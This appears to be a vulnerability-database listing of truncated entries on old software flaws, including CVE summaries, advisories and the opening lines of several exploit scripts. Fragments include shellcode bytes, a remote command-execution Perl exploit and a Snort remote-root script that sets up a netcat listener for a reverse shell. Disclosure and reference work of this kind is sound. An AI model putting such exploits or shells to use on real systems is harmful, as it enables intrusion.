Yahoo messenger multiple security vulnerabilities

Filename spoofing, local privilege escalation with Audio Setup Wizard...

CVE-2005-0242

The CVE-2005-0242 vector affects Yahoo! Messenger (Windows), where the Audio Setup Wizard (asw.dll) could execute arbitrary code by placing a malicious ping.exe in the Messenger directory due to weak default permissions. The vulnerability enables local code execution with the privileges of the us...

GNU a2ps - Anything to PostScript Not SUID Local Overflow

/ Not added to Local Non Poc section /str0ke / include include include // by lizard / lizstyleatgmail.com // greets go to slider/trog for helpin me // not suid by default ; define VULNTHING "/usr/bin/a2ps" define DEFRET 0xbffffffa - strlensc - strlenVULNTHING define xnullbitch 1100 //im not a asm...

Microsoft Internet Explorer Install Engine Control Buffer Overflow (#NISR19012005a)

NGSSoftware Insight Security Research Advisory Name: Microsoft Internet Explorer Install Engine Control Buffer Overflow Systems Affected: Microsoft Internet Explorer 5.x/6.x Severity: High Vendor URL: http://www.microsoft.com/ Author: Peter Winter-Smith [email protected] Date of Public...

DEBIAN-CVE-2004-1311

Integer overflow in the realsetupandgetheader function in real.c for Unix MPlayer 1.0pre5 allows remote attackers to cause a denial of service application crash and possibly execute arbitrary code via a Real RTSP streaming media file with a -1 content-length field, which leads to a heap-based...

CVE-2004-2718

PHPMyChat 0.14.5 does not remove or protect setup.php3 after installation, which allows attackers to obtain sensitive information including database passwords via a direct request...

CVE-2004-2407

Unknown vulnerability in phpGroupWare before 0.9.14.002 has unknown attack vectors and impact, related to a "security hole" in the Setup/Config functionality...

Ultrix dxterm buffer overflow

setup flag buffer overflow...

Hydra: SOCKS5

This plugin runs Hydra to find SOCKS5 accounts and passwords by brute force. To use this plugin, enter the 'Logins file' and the 'Passwords file' under the 'Hydra NASL wrappers options' advanced settings block. TRUSTED...

Microsoft Internet Explorer Install Engine contains a buffer overflow vulnerability

Overview The Active Setup Install Engine in Microsoft Internet Explorer contains a buffer overflow vulnerability. This may allow an attacker to take complete control of a vulnerable system. Description The Active Setup Install Engine inseng.dll permits cabinet files to be launched and executed...

Microsoft Windows XP - Workstation Service Remote (MS03-049)

Microsoft Windows XP - Workstation Service Remote MS03-049 / To build new netapi32.lib pedump /exp netapi32.dll netapi32.exp buildlib netapi32.exe netapi32.exp netapi32.lib netapi32.dll d:\rpcwksbo.exe WKS service remote exploit MS03-049 by fiNis fiNisatbkdotru, ver:0.1.1...

Poster.Version:Two Setup Vulnerability

Author: DarkKnight My site: http://www.insecureonline.com Product: Poster.version:two Side Note: This is my first post ever on bugtraq, so bear with me. Vendors: Contacted A vulnerability exists within Poster.version:two that allows a remote attacker to add accounts to a Poster.version:two. The...

CVE-2003-0633

CVE-2003-0633 affects Oracle E-Business Suite 11.5.1–11.5.8, specifically the AOL/J Setup Test Suite component aoljtest.jsp. The vulnerabilities allow a remote attacker to obtain sensitive information without authentication, including the GUEST user password and the application server security ke...

CVE-2003-0426

The installation of Apple QuickTime / Darwin Streaming Server before 4.1.3f starts the administration server with a "Setup Assistant" page that allows remote attackers to set the administrator password and gain privileges before the real administrator...

mnoGoSearch 3.1.20 - Remote Command Execution

!/usr/bin/perl reloaded Remote Exploit for mnoGoSearch 3.1.20 that performs remote command execution as the webserver user id for linux ix86 by pokleyzz use IO::Socket; $host = "127.0.0.1"; $cmd = "ls -la"; $searchpath = "/cgi-bin/search.cgi"; $rawret = 0xbfff105c; $ret = ""; $suffsize = 0; $port...

Snort <=1.9.1 Remote Root Exploit (p7snort191.sh)

No description provided by source. !/bin/sh p7snort191.sh by truff [email protected] Snort 1.9.1 and below remote exploit Tested on Slackware 8.0 with Snort 1.9.1 from sources Usage: 1/ Launch a listening netcat to listen for the shell nc -p 45295 -l 2/ p7snort119.sh yourIP RetAddr Where yourIP i...

MS Windows WebDAV (ntdll.dll) Remote Exploit

Exploit for unknown platform in category remote exploits ============================================ MS Windows WebDAV ntdll.dll Remote Exploit ============================================ // / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / /...

Multiple game servers DDoS attacks

Large UDP response is sent in reply to short request withous session setup...

Windows 2000 SMB signing protection bypass

During connectio nsetup it's possible to switch off SMB signing regardless of policy setting...

GLIBC locale - Format Strings

GLIBC locale - Format Strings / su.c by xp, modified by logikal@efnet - tested on redhat 5 - 7 / include include include include include include include include char shellcode = "\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb" "\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"...